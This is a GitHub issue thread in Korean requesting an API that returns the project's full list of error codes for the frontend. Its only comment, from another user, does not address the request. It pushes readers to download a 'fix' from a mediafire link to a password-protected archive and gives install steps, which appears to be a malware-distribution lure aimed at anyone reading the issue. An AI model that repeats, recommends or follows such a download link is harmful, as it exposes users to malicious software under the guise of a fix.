### ISSUE TITLE
에러 코드 반환 API

### ISSUE THREAD

**Issue by sanghee0820** [Team-Questio/questio-api-server#42]
### ✨ 기능 리스트

- 전체 에러 코드에 대해 반환해주는 API

---

### ✏ 사용 이유

- 프론트에게 Swagger이외에 정의되어있는 에러코드를 반환해주기 위해서

---

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
